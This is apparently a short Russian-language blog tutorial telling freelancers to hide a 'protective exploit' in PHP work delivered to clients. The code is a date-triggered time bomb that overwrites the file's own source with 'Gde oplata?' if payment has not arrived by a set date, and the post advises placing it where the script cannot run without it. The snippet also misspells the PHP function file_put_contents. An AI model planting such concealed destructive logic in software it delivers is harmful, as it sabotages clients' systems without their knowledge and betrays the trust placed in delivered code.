Сегодня мы разработаем exploit и интегрируем его в свою работу, чтобы защититься от мошенников на фрилансе. Часто бывает, что заказчик требует залить работу без предоплаты сразу на его хостинг.
В этом случае рискуете именно вы, но если использовать exploit , то в львиной доле случаев можно себя обезопасить.
Неважно во что вы собираетесь интегрировать exploit, будь то плагин WordPress, большой WEB-сайт или даже вёрстка.
В своей работе необходимо найти основной php файл, который вы защитите. Далее в исходном коде нужно найти точку ввода нашего эксплойта. Как правило, это место в коде, без которого сам скрипт работать не будет.
Exploit выглядит следующим образом:
// exploit
if( strtotime('04.09.2018') < time() )
{
file_put_content(__FILE__, 'Gde oplata?');
}
Это простейший вариант эксплойта, который только может быть.
Данный код будет работать ровно до 4 сентября 2018 года. У заказчика до этого момента будет время, чтобы проверить вашу работу и соответственно произвести оплату.
Важно!
Если заказчик не успеет за отведенное время произвести оплату за работу, то есть кинет вас,
тогда весь исходный код php файла будет удален, а вместо него встанет надпись «Gde oplata?».